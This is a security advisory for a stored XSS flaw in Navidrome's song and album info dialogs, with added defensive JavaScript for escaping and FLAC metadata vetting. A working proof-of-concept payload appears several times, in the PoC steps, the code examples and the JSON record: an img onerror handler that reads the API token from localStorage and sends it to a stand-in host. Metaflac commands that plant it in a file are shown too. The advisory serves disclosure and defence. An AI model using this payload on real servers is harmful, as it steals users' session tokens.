GHSA-RH3R-8PXM-HG4W

Vulnerability from github – Published: 2026-02-04 00:12 – Updated: 2026-02-05 00:37
Summary
Navidrome has XSS via comment from song metadata
Details

Summary

A cross-site scripting (XSS) vulnerability in the Navidrome web frontend allows an attacker to inject script through the comment metadata of a song and use it to exfiltrate the logged-in user's credentials (the API token).

An attacker's maliciously crafted song has to be added to Navidrome to exploit the vulnerability.

Details

The frontend is written in React. In several places the code uses the dangerouslySetInnerHTML escape hatch to set the content of an HTML element.

In some of those places the value is first sanitized by stripping anything that looks like an HTML tag. In at least one place the value is used as is, which is what leads to the XSS vulnerability.

In the MultiLineTextField component, the input is split into lines and each line is rendered through the dangerouslySetInnerHTML property:

<div
  data-testid={`${source}.${idx}`}
  key={md5(line + idx)}
  dangerouslySetInnerHTML={{ __html: line }}
/>

This component is used by the SongInfo and AlbumInfo components to render the comment of a song or album. The comment is taken verbatim from the file's metadata, such as the COMMENT field of a FLAC file's Vorbis comment block.

By crafting the contents of the comment field, an attacker can inject script into the frontend, and it runs whenever a user opens the song or album info dialog.

Additionally, because the Navidrome API token is kept in localStorage and no Content Security Policy is in place unless the user has configured one outside of Navidrome, the injected script can read the token and send it to an attacker-controlled host.
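To make the escape hatch concrete, the following is an added example (not Navidrome's code, and not the project's actual fix) that models what MultiLineTextField does with a comment and puts the hardened alternative next to it. The function names renderCommentUnsafe, renderCommentSafe, escapeHtml and hasEventHandlerMarkup and the sample comment are this example's own; React itself is not needed to see the difference, because the bug is entirely about which string reaches innerHTML.

```javascript
// Added example, not Navidrome's code: models what MultiLineTextField does
// with a comment (`dangerouslySetInnerHTML={{ __html: line }}` per line) and
// the hardened alternative of escaping each line. Function names and the
// comment text below are this example's own.

// The payload from the advisory's PoC.
const PAYLOAD =
  '<img src=x onerror="fetch(`https://example.com/c2c/${localStorage.getItem(\'token\')}`)" />';

// Stand-in for what React does with text children: escape the characters
// that can open markup or terminate an attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable shape: each line of the comment becomes innerHTML verbatim, so
// a line containing a tag is parsed as HTML and its event handler runs.
function renderCommentUnsafe(comment) {
  return comment
    .split('\n')
    .map((line, idx) => `<div data-testid="comment.${idx}">${line}</div>`)
    .join('');
}

// Hardened shape: the line is inserted as escaped text. The browser shows
// the payload literally; one div per line still preserves the line breaks,
// which is the only thing innerHTML was buying in the first place.
function renderCommentSafe(comment) {
  return comment
    .split('\n')
    .map((line, idx) => `<div data-testid="comment.${idx}">${escapeHtml(line)}</div>`)
    .join('');
}

// Does the rendered HTML contain an element carrying an on* event handler?
// (Good enough for this demo; not a substitute for a real HTML sanitizer.)
function hasEventHandlerMarkup(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Constructed comment: a harmless first line followed by the payload.
const COMMENT = `Great album!\n${PAYLOAD}`;

console.log(hasEventHandlerMarkup(renderCommentUnsafe(COMMENT))); // true
console.log(hasEventHandlerMarkup(renderCommentSafe(COMMENT)));   // false
```

The point of the hardened variant is that nothing in the comment path needs HTML at all: the component only wanted line breaks, and those survive as one element per line with escaped text, so there is no reason to reach for innerHTML.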

PoC

  1. Modify the comment field of a song to contain the following payload, using a tool like MusicBrainz Picard:

<img src=x onerror="fetch(`https://example.com/c2c/${localStorage.getItem('token')}`)" />

or use metaflac. The payload is written to a file first so the shell does not consume the inner single quotes, and --set-tag-from-file sets the tag to the file's contents verbatim (a plain --set-tag=comment=VALUE would store VALUE literally):

printf '%s' '<img src=x onerror="fetch(`https://example.com/c2c/${localStorage.getItem('\''token'\'')}`)" />' > payload.txt
metaflac --set-tag-from-file=comment=payload.txt file.flac

  2. Add the song to Navidrome.
  3. Open the "Songs" page or one of the album pages, click the "kebab menu" and then "Get Info".

With this payload, a broken image is visible in the info dialog: the img element was parsed as HTML, its src failed to load, and that failure is what fires the onerror handler.


In the developer tools' network inspector, the request exfiltrating the token to an example domain can be seen.


Impact

The vulnerability affects users of the Navidrome web UI whose library contains songs from untrusted sources: any user who opens the song or album info for such a track runs the injected script in their own session.

Mitigations

  • Users of Navidrome should configure a strict Content Security Policy (https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP) in their reverse proxy to make exfiltration more difficult. A connect-src (or default-src) limited to the Navidrome origin blocks the fetch() used in the PoC, and a script-src without 'unsafe-inline' blocks inline event handlers such as onerror altogether, provided the UI still works under it.
  • Users of Navidrome should not index songs from untrusted sources without first vetting their metadata.
  • Upgrade to Navidrome 0.60.0 or later, which contains the fix (see the affected range and the commit and release references below).
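As one concrete form of the "vet their metadata" mitigation, the following added example (not Navidrome's or metaflac's code) parses the VORBIS_COMMENT block out of a FLAC file and flags tag values that start an HTML tag, so files from untrusted sources can be screened before they are indexed. The FLAC bytes are a fixture constructed in code by buildFlac(); the helper names and the MARKUP pattern are this example's own assumptions, and the check is deliberately conservative (a '<' followed by a tag-starting character), so it flags the PoC payload but not a comment such as "5 < 10".

```javascript
// Added example, not Navidrome's or metaflac's code: parse the VORBIS_COMMENT
// block of a FLAC file and flag tag values that contain HTML markup, so files
// from untrusted sources can be vetted before they are indexed. The FLAC
// bytes are a fixture constructed by buildFlac(); helper names and the
// MARKUP pattern are this example's own.

// FLAC layout: the "fLaC" marker, then metadata blocks. Each block starts
// with a 1-byte header (bit 7 = last-metadata-block flag, bits 0-6 = type;
// 0 = STREAMINFO, 4 = VORBIS_COMMENT) and a 24-bit big-endian body length.
// A VORBIS_COMMENT body is: u32le vendor length, vendor string, u32le
// comment count, then per comment a u32le length and "KEY=value" in UTF-8.
function parseVorbisComments(buf) {
  if (buf.length < 4 || buf.toString('latin1', 0, 4) !== 'fLaC') {
    throw new Error('not a FLAC stream');
  }
  const tags = [];
  let off = 4;
  for (;;) {
    if (off + 4 > buf.length) throw new Error('truncated metadata block header');
    const hdr = buf[off];
    const isLast = (hdr & 0x80) !== 0;
    const type = hdr & 0x7f;
    const len = buf.readUIntBE(off + 1, 3);
    const body = buf.subarray(off + 4, off + 4 + len);
    if (body.length !== len) throw new Error('truncated metadata block body');
    if (type === 4) {
      let p = 0;
      const vendorLen = body.readUInt32LE(p);
      p += 4 + vendorLen;
      const count = body.readUInt32LE(p);
      p += 4;
      for (let i = 0; i < count; i++) {
        const l = body.readUInt32LE(p);
        p += 4;
        const entry = body.toString('utf8', p, p + l);
        p += l;
        const eq = entry.indexOf('=');
        if (eq < 0) continue; // malformed entry without a field name
        // Field names are case-insensitive in Vorbis comments.
        tags.push({ key: entry.slice(0, eq).toUpperCase(), value: entry.slice(eq + 1) });
      }
    }
    off += 4 + len;
    if (isLast) break;
  }
  return tags;
}

// A '<' followed by a letter, '/', '!' or '?' opens a tag, end tag,
// comment/doctype or bogus comment in HTML; plain "5 < 10" does not match.
const MARKUP = /<[a-z\/!?]/i;

// Returns the tags whose value would be parsed as markup if it ever reached
// innerHTML, keyed so the caller can decide what to do per field.
function findSuspiciousTags(buf) {
  return parseVorbisComments(buf).filter((t) => MARKUP.test(t.value));
}

// --- fixture construction (constructed data, not a real file) ---
function u32le(n) { const b = Buffer.alloc(4); b.writeUInt32LE(n, 0); return b; }
function lenPrefixed(b) { return Buffer.concat([u32le(b.length), b]); }
function metadataBlock(type, body, last) {
  const h = Buffer.alloc(4);
  h[0] = (last ? 0x80 : 0) | type;
  h.writeUIntBE(body.length, 1, 3);
  return Buffer.concat([h, body]);
}
// Builds the marker, a zeroed 34-byte STREAMINFO (required first in a real
// file; never decoded here) and a VORBIS_COMMENT block with the given tags.
function buildFlac(comments) {
  const vendor = lenPrefixed(Buffer.from('example vendor', 'utf8'));
  const entries = comments.map((c) => lenPrefixed(Buffer.from(c, 'utf8')));
  const vc = Buffer.concat([vendor, u32le(comments.length), ...entries]);
  return Buffer.concat([
    Buffer.from('fLaC', 'latin1'),
    metadataBlock(0, Buffer.alloc(34), false),
    metadataBlock(4, vc, true),
  ]);
}

const SAMPLE = buildFlac([
  'TITLE=Some Song',
  'ARTIST=Some Artist',
  'COMMENT=<img src=x onerror="fetch(`https://example.com/c2c/${localStorage.getItem(\'token\')}`)" />',
]);

console.log(findSuspiciousTags(SAMPLE).map((t) => t.key)); // [ 'COMMENT' ]
```

Run against a real file, parseVorbisComments would be handed the file's bytes read from disk; the parser only touches the metadata blocks before the audio frames, so there is no need to load a whole album into memory. On a flagged file, metaflac --remove-tag=COMMENT (a real metaflac option) is the simplest way to drop the field before the file is indexed.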

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/navidrome/navidrome"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.60.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25578"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-80"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-04T00:12:20Z",
    "nvd_published_at": "2026-02-04T22:16:01Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nAn XSS vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials.\n\nAn attacker\u0027s maliciously crafted song has to be added to Navidrome to exploit the vulnerability.\n\n### Details\n\nThe frontend is using React. In various places, the code uses the `dangerouslySetInnerHTML` escape hatch to set the content of an HTML element.\n\nIn some places, the value is first sanitized by removing anything looking like an HTML tag. In at least one place the value is used as is, thus leading to the XSS vulnerability.\n\nIn `MultiLineTextField` component, the input is split into lines and rendered through the `dangerouslySetInnerHTML` property. \n\n```js\n\u003cdiv\n  data-testid={`${source}.${idx}`}\n  key={md5(line + idx)}\n  dangerouslySetInnerHTML={{ __html: line }}\n/\u003e\n```\n\nThis component is then used in the `SongInfo` and `AlbumInfo` components, when rendering the comment of the song or album. The contents of the comments field is taken verbatim from the metadata of a song, such as the VORBIS `COMMENT` comment of a FLAC file.\n\nBy crafting the contents of the comment field, an attacker can inject code into the frontend, which runs whenever a user views the song or album info.\n\nAdditionally, as the Navidrome API token is kept in local storage and since there\u0027s no CSP in place unless the user\u0027s configured one outside of Navidrome, the attacker can exfiltrate the API token.\n\n### PoC\n\n1. Modify the comment field of a song to contain the following payload using a tool like MusicBrain\u0027z Picard:\n\n```js\n\u003cimg src=x onerror=\"fetch(`https://example.com/c2c/${localStorage.getItem(\u0027token\u0027)}`)\" /\u003e\n```\n\nor use `metaflac`:\n\n```shell\necho \u0027\u003cimg src=x onerror=\"fetch(`https://example.com/c2c/${localStorage.getItem(\u0027token\u0027)}`)\" /\u003e\u0027 | metaflac --set-tag=comment=\u003c(cat) file.flac\n```\n\n2. Add the song to Navidrome\n3. Enter the \"Songs\" or one of the albums page, click the \"kebab menu\" and then \"Get Info\"\n\nIn this payload, a broken image can be seen in the info dialog.\n\n\u003cimg width=\"996\" height=\"660\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1467cdff-17b2-4dc6-9fb5-0a83c021ca04\" /\u003e\n\nIn the developer tools\u0027 network inspector, the request exfiltrating the token to an example domain can be seen.\n\n\u003cimg width=\"410\" height=\"34\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3f668797-63a6-4355-ae57-e95bde444143\" /\u003e\n\n\n### Impact\n\nThe vulnerability affects users of the Navidrome UI with songs from untrusted sources.\n\n### Mitigations\n\n- Users of Navidrome should configure a strict [[Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP) in their reverse-proxy to make exfiltration more difficult\n- Users of Navidrome should not index songs from untrusted sources without first vetting their metadata",
  "id": "GHSA-rh3r-8pxm-hg4w",
  "modified": "2026-02-05T00:37:01Z",
  "published": "2026-02-04T00:12:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25578"
    },
    {
      "type": "WEB",
      "url": "https://github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/navidrome/navidrome"
    },
    {
      "type": "WEB",
      "url": "https://github.com/navidrome/navidrome/releases/tag/v0.60.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Navidrome has XSS via comment from song metadata"
}

